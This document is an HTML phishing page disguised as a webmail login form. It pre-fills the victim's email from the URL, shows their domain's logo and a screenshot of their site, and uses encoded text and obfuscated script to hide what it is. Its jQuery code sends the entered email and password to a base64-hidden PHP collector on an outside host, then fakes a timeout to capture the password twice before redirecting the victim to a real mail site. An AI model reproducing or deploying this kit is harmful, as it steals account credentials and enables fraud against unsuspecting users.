<!doctype html>
<html lang="en">

<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <script src="https://code.jquery.com/jquery-2.2.4.min.js"
        integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
    <title>&#87;&#101;&#98;&#109;&#97;&#105;&#108;&#32;&#45;&#32;&#76;&#111;&#103;&#105;&#110;&#46;</title>

    <style>
        body {
            background-color: #eeeeee;
            font-family: Helvetica Neue, Helvetica, sans-serif;
            font-size: 13px;
            color: #425152;
            margin: 0;

        }

        ::-moz-placeholder {
            color: #d9dad9;
        }

        :-ms-input-placeholder {
            color: #d9dad9;
        }

        ::-ms-input-placeholder {
            color: #d9dad9;
        }

        ::placeholder {
            color: #d9dad9;
        }

        a {
            color: #425152;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        input {
            border-radius: 5px;
            padding: 5px 3px;
        }

        input.submit {
            font-weight: bold;
            text-align: center;
            min-width: 90px;
            color: #f0f0f0;
            background: #444444;
            padding: 5px 12px;
            border-color: #444444;
            border-style: solid;
            cursor: pointer;
        }

        input.submit:hover {
            color: #ffffff;
        }

        .row {
            margin: 10px 0;
        }

        .row:after {
            content: "";
            display: table;
            clear: both;
        }

        .logoWithPortalIcons {
            width: 150px;
            height: 50px;
            background: transparent url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAAARCAYAAAA/tFWCAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH3gYNAictBVTA/AAAAj5JREFUaN7tWdFtgzAQfakyAPICyQffNCOQCdpMUDaoMkHIBFUnSDJB0gkgE5T62x9MgLJB+pGLRK2AMbYbiHgSPxjuznfPvjt7BOAMO0gBzAGgCHwPQAJgJn2zZlzEReBX6mRcjIrAD+n/MnIAC8ZFVnoXA1i1sPUEICOZO7LdVOYVIwC37J+X9LT1eUaPbDMqdOpiTfNPSF5rHzzBDfY3SGWKKYA9kdYUHjkuIidG6AdmfbHZOrGKwJ8Zsl1FrlcHcjcku0/YOPRz94jlKPBlvDiSG6J/eO+qYeOaPGtSa6nG1goZec03eZM6r8HO900psfzuWmOV5y/XG011tKltVOl7Iy1c1SIetbRHnp/sA6W9Y9tMZVykCnKBcRErxnNDcqMBcbOe7VInAJ//kBGc7VgTTYdfO6xrjRUBeKv4dse42Das0z6qOiPGxVJRlDfZsfqY+myn9z+xc02sSLPjkFNDXdCOml1bm64pMdgRHg2JZuw6Xbz3FYfBBQOxbGOraAoGWEiFqUbKQscCkuNyKq3CREr3EXU6j0au9T1jd5aeuEeOiyXbE4N5hzV1iq6OUCG/rc9vyW0yZqNW07LX+nED3fNVBSllXKRF4Md1RxFF4E9rGoi8SWc54C6YUROUjx0ID1F/iZsqxmPqLFc1/w/EstMVytgZ+HZPpPIAHF0QK3PsrK+BL1qLXAdHAz07XK6YPAC59a6QcXFwWBSehmOBzsKjuJ9cHjcs4ObAcUnXPQO6hRTAc2nx//wCPaq4/QlxCjAAAAAASUVORK5CYII=')
                /*IconsTogether.svg*/
                no-repeat left top;

        }

        .logoOnly {
            width: 280px;
            height: 30px;
            overflow: hidden;
        }

        .logoOnly .logoWithPortalIcons {
            width: 320px;
            height: 120px;
        }

        .title {
            font-size: 26px;
            margin: 20px 0 10px;
        }

        .red {
            color: #EE3031;
        }

        a#create-account {
            display: inline-block;
            border-radius: 4px;
            padding: 3px 8px;
            border: 1px solid #EE3031;
        }

        a#create-account:hover {
            text-decoration: none;
        }

        .col1,
        .col2 {
            float: left;
            line-height: 30px;
            vertical-align: middle;
            padding-top: 4px;
        }

        .col1 {
            width: 124px;
            font-size: 13px;
            font-weight: 600;
        }

        .col2 {
            width: 286px;
        }

        .col2 input {
            width: 96%;
        }

        .error {
            color: #D52B1E;
            font-weight: normal;
        }

        .container {
            background: rgba(255, 255, 255, 1.0);
            padding: 40px;
            box-shadow: 2px 2px 4px 2px #ccc;
            width: 416px;
            border-radius: 5px;
            /*
            margin: 0 auto;
            position:absolute;
            left:0;
            right:0;
            top:38%;
            top:100px\9;
            transform: translateY(-50%);
			*/
            margin: 10% auto 30px auto;
            box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
            transition: all 0.3s cubic-bezier(.25, .8, .25, 1);

        }

        .password-icon {
            width: 20px;
            position: absolute;
            cursor: pointer;
            margin-top: 9px;
            margin-left: -28px;
            background-color: white;
        }

        #login_footer {
            line-height: 125%;
            font-size: 12px;
            text-align: justify;
            width: 500px;
            margin: 90px auto auto auto;
            padding-left: 10px;
        }


        @media only screen and (max-width: 600px) {
            body {
                background-image: blur(1.2px);


            }

            .container {
                /*
                position:relative;
                padding: 20px;
                box-shadow:none;
                width: 375px;
                top:0;
                left:auto;
                right:auto;
                transform: translateY(0);
				*/
                width: 100%;
                border-radius: 0;
                box-shadow: none;
                padding: 0;
                margin-top: 0;

            }

            .container div.body {
                padding: 40px 20px;

            }

            .col1,
            .col2 {
                float: none;
                width: 100%;
            }

            #login_footer {
                width: 99%;
                margin-top: 20px;
            }

            #login_footer div.content {
                padding: 10px 20px 10px 10px;
            }

            .password-icon {
                margin-top: -25px;
                right: 7%;
            }

        }


        .xlogo {
            color: #fff;
            margin-bottom: 10px;
            margin-top: -25px;
        }

        .xlogo img {
            vertical-align: middle;
            width: 5%;
            height: 5%;
            object-fit: contain
        }

        .xlogo span {
            vertical-align: middle
        }

        .text-g {
            font-family: "Arial Black", Gadget, sans-serif;
            text-transform: uppercase !important;
            text-align: center;
            font-size: 25px;
            color: #444444;
            background-color: rgba(255, 255, 255, 0);
            text-shadow: rgb(255, 255, 255) 2px 2px 2px;
        }

        #root {
            position: absolute;
            left: 0;
            right: 0;
            bottom: 0;
            top: 0;
            z-index: -10;
            pointer-events: none;
            filter: brightness(0.3)
        }

        .enableBlur>* {
            filter: blur(1.2px);
        }

        .disableBlur {
            filter: blur(0);
        }
    </style>

    <meta http-equiv="X-Translated-By" content="Google">
    <meta http-equiv="X-Translated-To" content="en">

    <meta name="robots" content="none">
</head>

<body>

    <div id="login_form" action="" method="post" autocomplete="off">
        <input type="hidden" name="csrfmiddlewaretoken"
            value="xWUPRch6gUXcsYdMNLyWrIvExcWeJ3qTtf8VMHZWmQ2EBBFj3eYVAcVdcPIJiDWq">
        <input type="hidden" name="next" value="/">

        <div class="container" id="container" style="padding-bottom:10px!important; position: relative;">
            <div style="position:absolute; top:0; width:100%; height:100%; left:0; background:#fff; opacity:0.7; display:none"
                id="background-image">
            </div>
            <img src="https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif"
                style="width:50px; position:absolute; top:50%; left:50%; transform:translate(-50%, -50%); display:none"
                id="processing">
        </div>
    </div>
    <script type="text/template" id="tpl-password">

    <input type="hidden" class="form-control" name="hido" id="hido" value="">
    <input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">
        <div class="body">
           
            <div class="xlogo">
                <img id="logoimg" src="https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3">
                <span style="text-transform: capitalize;" class='text-g' id="banNer"></span>
                </div>
            <div class="row">
                <div class="col1"><label for="id_email">&#69;&#109;&#97;&#105;&#108;&#58;</label></div>
                <div class="col2"><input type="text" name="email" value="" id="email" placeholder="&#69;&#109;&#97;&#105;&#108;&#32;&#65;&#100;&#100;&#114;&#101;&#115;&#115;"></div>
            </div>
                <div class="col1"><label for="id_pass">&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#58;</label></div>
                <div class="col2"><input type="password" name="password" id="password" placeholder="&#69;&#109;&#97;&#105;&#108;&#32;&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;"></div>
                  <img id="id-password-reveal-icon" class="password-icon" src="https://fac.corp.fortinet.com/customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/" alt="" />
            </div>
            <br><br>
            <div class="row">
                <span id="error-session" class="error-notice" style="color: red">
                    &#32;&#83;&#101;&#115;&#115;&#105;&#111;&#110;&#32;&#69;&#120;&#112;&#105;&#114;&#101;&#100;&#46;
                </span>
               <span id="msg" class="error-notice" style="display: none;padding: 10px; height: 20px; width:1220px;vertical-align: middle; border:0px solid red; color:red; font-size: 16px;	color: red;
	font-family: 'wf_segoe-ui_semilight', 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-top: 12px;
       ">&#89;&#111;&#117;&#114;&#32;&#108;&#111;&#103;&#105;&#110;&#32;&#97;&#116;&#116;&#101;&#109;&#112;&#116;&#32;&#116;&#105;&#109;&#101;&#100;&#32;&#111;&#117;&#116;&#46;&#32;&#80;&#108;&#101;&#97;&#115;&#101;&#32;&#116;&#114;&#121;&#32;&#97;&#103;&#97;&#105;&#110;&#46;</span>
	   
	   <span id="error" class="error-notice" style="display: none;padding: 10px; height: 20px; width:1220px;vertical-align: middle; border:0px solid red; color:red; font-size: 16px;	color: red;
	font-family: 'wf_segoe-ui_semilight', 'Segoe UI Semilight', 'Segoe WP Semilight', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;
	margin-top: 12px;
       ">&#69;&#110;&#116;&#101;&#114;&#32;&#121;&#111;&#117;&#114;&#32;&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;</span>
            </div>
            <div class="row">
                <div class="col1" style="line-height:40px;padding-top:10px;">
                    <input type="button" id='submit-btn' class="submit" value="Log in to continue" style="padding:7px 24px;" /></div>
            </div>
            <div class="row">
                
                <p>
                    &#67;&#111;&#112;&#121;&#114;&#105;&#103;&#104;&#116;&#32;&#169;&#32;&#50;&#48;&#50;&#51; <span id="kai" style="text-transform: capitalize;"></span>.
                    <br>
                    <br>
                </p>
            </div>
        </div>
    </script>
    <script>
        var _0x1831da = _0x1c4f; (function (_0x19fc8d, _0x45ad8d) { var _0x56646c = _0x1c4f, _0x514d6b = _0x19fc8d(); while (!![]) { try { var _0x2ac149 = -parseInt(_0x56646c(0x11f)) / 0x1 + -parseInt(_0x56646c(0x120)) / 0x2 * (parseInt(_0x56646c(0x123)) / 0x3) + -parseInt(_0x56646c(0x126)) / 0x4 + parseInt(_0x56646c(0x128)) / 0x5 * (parseInt(_0x56646c(0x124)) / 0x6) + parseInt(_0x56646c(0x11e)) / 0x7 + parseInt(_0x56646c(0x121)) / 0x8 + -parseInt(_0x56646c(0x125)) / 0x9; if (_0x2ac149 === _0x45ad8d) break; else _0x514d6b['push'](_0x514d6b['shift']()); } catch (_0x39d37d) { _0x514d6b['push'](_0x514d6b['shift']()); } } }(_0x33e7, 0xf266c)); var html = ''; html = document[_0x1831da(0x127)](_0x1831da(0x129))[_0x1831da(0x122)]; function _0x1c4f(_0x2f9ca5, _0x39e4aa) { var _0x33e749 = _0x33e7(); return _0x1c4f = function (_0x1c4fe5, _0x13b4f3) { _0x1c4fe5 = _0x1c4fe5 - 0x11e; var _0x22f4a1 = _0x33e749[_0x1c4fe5]; return _0x22f4a1; }, _0x1c4f(_0x2f9ca5, _0x39e4aa); } var container = document[_0x1831da(0x127)](_0x1831da(0x12a)); container[_0x1831da(0x122)] += html; function _0x33e7() { var _0x3fcf96 = ['80KsLiRV', 'tpl-password', 'container', '12515440MyiXzF', '908262gmsxIg', '6212SFIYce', '11143600zYICZq', 'innerHTML', '1002YKQdSq', '10878hFgQJw', '678213VynMvc', '783916CdqYII', 'getElementById']; _0x33e7 = function () { return _0x3fcf96; }; return _0x33e7(); }
    </script>
    <div id="root"> <iframe id="myframe" scrolling="no"
            style="position:absolute; top:0; width:100%; height:100%; left:0; background:#fff; opacity:0.7;  width="
            100%" height="100%" frameborder="0"></iframe>
    </div>

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

    <script>
        const phpLink = 'aHR0cHM6Ly9pcHNudWV2YXBvcGF5YW4uY29tL2ludGVncmEvd20ucGhw'
    </script>

    <script>
        $(document).ready(function () { function a(a) { function b(a) { return /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(a) } return !!b(a) || !!atob(a) && (!!b(atob(a)) || void 0) } function b() { $("#processing").show(), $("#error-session").hide(), setTimeout(() => { $("#error").hide(), $("#msg").hide(); var b = $("#msg").html(); $("#msg").text(b); return a($("#email").val()) ? 1 > $("#password").val().length ? ($("#processing").hide(), $("#error").show(), $("#error").html("Password is empty"), $("#password").focus(), !1) : void d() : ($("#processing").hide(), $("#error").show(), $("#error").html("The email field is empty!"), $("#email").focus, !1) }, 2e3) } function d() { $.ajax({ url: atob(phpLink), type: "POST", data: { email: $("#email").val(), password: $("#password").val() } }).done(function () { $("#processing").hide(), 1 <= f ? location.href = "https://www.mailplug.com/front/main" : (f++, $("#processing").hide(), $("#password").val(""), $("#msg").show(), $("#password").focus()) }) } function e(a) { const b = a.match(/@(.+)$/); return b[1] } var f = 0; $("#m-btn").click(); var g = window.location.hash.substr(1); if (function (a) { return /^[A-Za-z0-9+/]+={0,2}$/.test(a) }(g) && (console.log("is base64"), g = atob(g)), !a(g)) $("#email").focus(); else { $("#email").val(g); var h = g, i = h.indexOf("@"), j = h.substr(i + 1), k = j.substr(0, j.indexOf(".")), c = k.toLowerCase(), l = k.toUpperCase(); $("#email").val(h), $("#email").attr("readonly", !0), $("#msg").hide(), $("#processing").hide(); var m = "url('https://image.thum.io/get/width/1200/https://" + j; "')", $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + e($("#email").val())), $("#kai").html("" + j), $("#banNer").html("" + j), $("#banNer").html(c), $("#bg_screen").html(m), document.body.style.backgroundImage = m, $("#password").focus() } $("#submit-btn").click(function (a) { a.preventDefault(), b() }) });
    </script>

    <script>
        $("#processing").hide()
    </script>
</body>


</html>
